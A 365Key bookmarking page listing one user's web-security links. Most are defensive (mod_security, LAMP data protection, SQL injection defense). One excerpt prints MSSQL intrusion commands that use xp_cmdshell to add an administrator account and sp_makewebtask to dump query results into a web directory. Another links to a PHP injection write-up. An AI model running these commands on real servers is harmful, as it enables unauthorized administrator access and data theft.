longrujun的网摘列表

搜索词： 时间： 任何时候 最近一周 最近一个月 最近一季度 最近半年 最近一年 分类： 所有分类 SQLSERVER 2000&2005[112] Windows Server 2003&Windows Vista[92] Unix&Linux Platforms[91] run2tech[83] Exchange Server 2003[35] web2.0[30] IIS、 Web Administration 、webapps[28] manual book[28] Oracle[24] Securtiy_Unix and Linux[22] HOWto[22] sometips[20] ISA Server 2004 [18] Cluster、Replication、Snapshot[17] database[16] meeting[14] mysql[14] Apache、WebLogic、Tomcat、Resin Web Srv[13] dns[13] Debian[12] Google[12] MySQL &PostgreSQL[10] it_managment[10] IA、QA[10] monitor[10] Iptables[9] Sendmail、Qmail、Postfix MailSrv[8] network community[8] Cache[8] Fireware[8] High Perform[8] kernel[8] websecurity[7] Linux[7] HOWTO:[7] cacti[7] squid[7] shell[7] Architecture[7] awstats、mrtg、webalizer[6] LAMP[6] English[5] network mgr[5] ITTL[5] scripts[5] memcache[5] 其他[4] others[4] solaris[4] SEO[4] ubuntu[4] Unix[4] SOA[4] api[4] Linux-VServer[4] LVS[4] security[4] Conference[4] IT Security[3] Router&Switcher[3]* Linux&Advanced Application[3] bsd[3] .net[3] CentOS[3] Securtiy_Unix[3] LDAP[3] linuxcommand[3] ajax[3] Scale[3] Proxy_Ssl_Vpn[2] SAN,NAS[2] book-unread[2] snort[2] Programming[2] cisco[2] Toolkit[2] cluster[2] Hacking[2] GSLB[2] rsync[2] SSH[2] backup[2] View[2] snmp[2] freetype[2] webapps[2] review[2] High_Perform[2] performance_optimization[2] Application[2] NIDS[2] mashup[2] Perform[2] XML[2] Digg.com[2] YouTube[2] User'sConference[2] redhat[2] gfs[2] 生活[1] 私有[1] music[1] Security_Win[1] blog[1] book-read[1] cvs[1] ipv4[1] Web[1] CDN[1] attack[1] Embedded[1] DB2[1] system[1] Resource[1] Kit[1] Documentation[1] Nagios[1] DB[1] mirror、replication、snapshot[1] Study[1] php-script[1] lighttpd[1] PHP-Optimize[1] Wiki[1] Nikto[1] OpenNMS[1] Bastille[1] Gentoo[1] OpenVPN[1] spider[1] MailSrv[1] FreeBSD[1] urlre[1] Write[1] xcopy[1] autobak[1] FtpSrv[1] lj[1] zlib[1] bzip[1] RRDTool[1] libcgi[1] libpng[1] makepp[1] apt[1] Scalability[1] Availability[1] Reliability[1] Log_Analyzers[1] fedora_core[1] IIS7[1] news[1] cracker[1] WP[1] asp.net[1] Securtiy_Lnix[1] Apache[1] Sysinternals[1] vpn[1] SSL[1] Adobe[1] commandline[1] Feed[1] idea[1] pipes[1] remix[1] RSS[1] yahoo[1] spam[1] EnterPrise[1] tech-outlook[1] 2007[1] myspace[1] search-engine[1] developerday[1] tuning[1] DBA[1] Windows[1] IBM[1] Cooperation[1] 感恩[1] sso[1] Distributed-System[1] Large-scale[1] Java[1] memcached[1] Google-developerday-2008[1] 新闻 娱乐 体育 财经 IT 军事 文化 Windows Server Platforms SCO UNIX&HP-Unix Proftpd、Wu-FTP、VS-FTP FtpSrv Informix & Sybase& DB2 book-reading      排序： 按相关度 按时间倒序

刷新列表 共1页、7项网摘

War on Web 2.0 Terror 点击：190 　分类：run2tech; web2.0; websecurity　时间：2006-10-15 1:45:06　longrujun收录　 War on Web 2.0 Terror http://www.readwriteweb.com/archives/war_on_web_20_terror.php

Secure Your Apache With mod_security | HowtoForge - Linux Howtos and Tutorials 点击：90 　分类：websecurity; Apache、WebLogic、Tomcat、Resin Web Srv　时间：2006-7-16 16:36:36　longrujun收录　 This article shows how to install and configure mod_security. mod_security is an Apache module (for Apache 1 and 2) that provides intrusion detection and prevention for web applications. It aims at shielding web applications from known and unknown attacks, such as SQL injection attacks, cross-site scripting, path traversal attacks, etc. In the first chapter I will show how to install mod_security on Debian Sarge, Ubuntu 6.06 LTS (Dapper Drake), and on Fedora Core 5, and in the second chapter I will describe how to configure Apache for mod_security which is independent from the distribution you're using. http://www.howtoforge.com/apache_mod_security

O'Reilly Network -- Data Protection for LAMP Applications 点击：83 　分类：websecurity; Apache、WebLogic、Tomcat、Resin Web Srv　时间：2006-7-16 16:31:40　longrujun收录　(还有1人收录)　 Data Protection for LAMP Applications The number of web and enterprise applications based on the LAMP application stack is growing. LAMP applications use Linux or BSD as the operating system, Apache as the web server, MySQL or PostgreSQL as the application database, and PHP, Perl, or Python as the programming language. Other applications use JBoss as the middleware. These layers have the following common attributes: They are open source and have a large developer and user community behind them. They are available on multiple hardware platforms and are very well integrated. An often overlooked aspect in the LAMP application solution is the protection of the application and configuration data. This article examines how to use available open source tools to protect the LAMP application data. The security aspects of the application data and securing the LAMP application servers is beyond the scope of this article. It is also important to test the data recovery scenarios before the actual need arises. http://www.oreillynet.com/pub/a/databases/2006/07/13/lamp-data-protection.html

Beyond Stored Procedures: Defense-in-Depth Against SQL Injection - Security Articles - IIS Tips Tricks & Resources 点击：36 　分类：websecurity; SQLSERVER 2000&2005　时间：2006-7-8 16:39:51　longrujun收录　 A few years ago, mentioning the phrase “SQL Injection” to developers or asking to adopt a “defense-in-depth” strategy would probably get you a blank stare for a reply. These days, more people have heard of SQL Injection attacks and are aware of the potential danger these attacks present, but most developers’ knowledge of how to prevent SQL Injection is still inadequate, and when asked how to defend their applications against SQL Injection, they usually reply, “That’s easy, just use stored procedures.” As we will see, using stored procedures is a great first step for your defense strategy, but is not sufficient as the only step. You need to adopt a defense-in-depth strategy. http://www.iis-resources.com/modules/AMS/article.php?storyid=576

大潘的网誌 Jordan's Blog-施普伦三角形变形来的三维坐标 T-I-E坐标 点击：60 　分类：websecurity; IA、QA　时间：2006-7-1 19:20:39　longrujun收录　 施普伦三角形和我将其变形后的三维坐标，是读《不论》这本书后的最大的收获。如果将施普伦变形三维坐标用在信息安全的思考上，真是有意思。 将能量理解为我们对于整个体系的控制能力； 将信息理解为我们对于整个体系的检测能力； 将时间理解为我们要花费的时间，特别是调整的时间... ... 　　另外一个更有意思的就是，上面三个方面正好可以和PDR三个方面对应上。 http://www.i170.com/user/jordanpan/Article_23442

sql入侵中用到的一些命令[更新:2006.5.23] 点击：47 　分类：websecurity　时间：2006-5-24 16:16:22　longrujun收录　 sql入侵中用到的一些命令[更新:2006.5.23] /* * 功能:通过xp_cmdshell执行命令 * 本例:添加一个系统帐号,并加入管理员组. */ exec master.xp_cmdshell 'net user kgdiwss 123 /add' exec master.xp_cmdshell 'net localgroup administrators kgdiwss /add' /* * 功能:将执行结果写入htm文件 * 注意:文件夹需要有写入的权限. */ exec sp_makewebtask "F:\wwwroot\kgdiwss\test\result.htm", /* 写入路径,也可以是http地址 */ "SELECT * FROM sysdatabases" /* 要执行的sql语句 */ http://blog.csdn.net/kgdiwss/archive/2006/05/23/751018.aspx

PHP注入某大型网站 - ＧＯＧＯ BLOG 点击：27 　分类：websecurity　时间：2005-9-13 23:37:33　longrujun收录　 http://blog.donews.com/gogoxboy/archive/2005/09/13/552032.aspx

页码： ［1］ 共1页、7项网摘

使用帮助 |  如何保存网摘 |  给365Key提建议 |  媒体报道 |  站长推广须知 Copyright (C) 2004 365Key.com--天天网摘 All Rights Reserved